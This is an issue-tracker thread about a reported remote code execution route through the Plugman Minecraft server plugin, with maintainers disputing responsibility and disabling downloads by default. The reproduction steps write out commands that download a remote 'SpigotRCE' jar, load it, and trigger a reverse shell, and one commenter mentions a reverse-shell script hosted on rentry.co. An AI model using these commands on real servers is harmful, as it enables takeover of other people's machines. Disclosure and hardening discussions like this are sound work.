Report of an exploit in the [plugman] plugin

[PvPWorldPL]

Confirmation

• [X ] My issue isn't already found on the Issue tracker.
• [ X] My issue is about Plugman and not any expansion or external plugin
• [ X] The issue isn't already fixed in a Spigot Release or Development Build.
• [ X] The Common Issues page doesn't mention this issue.

Type

Plugin Bug

What happens?

I have identified a potential remote code execution (RCE) exploit in the [Plugman] plugin. Below are the details of the exploit along with the steps to reproduce:

Expected Behaviour

I expected Plugman to securely handle plugin loading without exposing vulnerabilities to remote code execution. Specifically, I expected that the plugin would properly validate and sanitize input, preventing the execution of malicious code during the loading process. I anticipated that Plugman would adhere to standard security practices to ensure the integrity and safety of the server environment.

How to Reproduce

1. Install Plugman on your Spigot server.
2. Execute the following commands in-game:

   /cpi lmfao.jar https://transfer.sh/get/zCONva/SpigotRCE-1.0-SNAPSHOT-shaded.jar
   /plugman load CommandPanels/panels/lmfao.jar.yml

3. Enter one of the following commands in the chat:

   5170haxor linux yourreverseshellip
   # or
   5170haxor windows yourreverseshellip

Additional Info

This set of actions demonstrates the potential vulnerability in Plugman, allowing an attacker to exploit the plugin loading process for remote code execution. The provided code examples showcase how an unauthorized user can execute arbitrary commands on the server during the plugin loading process.

[MGlolenstine]

I don't think this is a problem in Plugman, as it does exactly what you tell it to.

How is the Plugman supposed to know that the plugin does something you don't want? I've had plugins that turned on lights in my house... Would that be a problematic plugin?

The issue here is that you have access to the plugin folder. Access to plugin installation should only be done through the console and not through a player command.

Restrict that command and the RCE is gone :)

Kind regards, LifE.

[PvPWorldPL]

The PlaceholderAPI also had something similar; they were repeating the same thing as you until they finally understood that it should be blocked.

[PvPWorldPL]

I think it would be appropriate to somehow block it so that the option is disabled by default when it comes to downloads.

[PvPWorldPL]

https://github.com/TypicalModMaker/Griefing-Methods/blob/main/isnow_griefing.txt

[Test-Account666]

I am going to disable the download command by default in the next update anyway.

But that wouldn't stop other plugins from downloading these files themselves...

Also, I'm unsure why this is included: /plugman load CommandPanels/panels/lmfao.jar.yml

PlugManX does not load plugins which are not inside the plugins directory.

The plugin you're loading would be CommandPanelspanelslmfao.jar.yml

Also, since this file doesn't end with .jar, PlugManX should refuse to load it.

I am going to investigate this further, in case I overlooked something

[IAISI]

Hack could be executed like this...

and rentry.co has sh script that would start reverse shell...

[Test-Account666]

Hack could be executed like this...

and rentry.co has sh script that would start reverse shell...

I understand, but as I said, the latest update disabled the download command by default.

Also, preventing the load of malicious plugins is not PlugManX's duty.

Just restart the server and it's going to load that plugin anyway

[IAISI]

Yea well, hacked servers will have to be cleaned up manually, we did full reinstall. Aside from PlugMan disabling this by default I don't think there's much to be done here.

[Test-Account666]

Well, I wish you a nice day and good luck with your server :)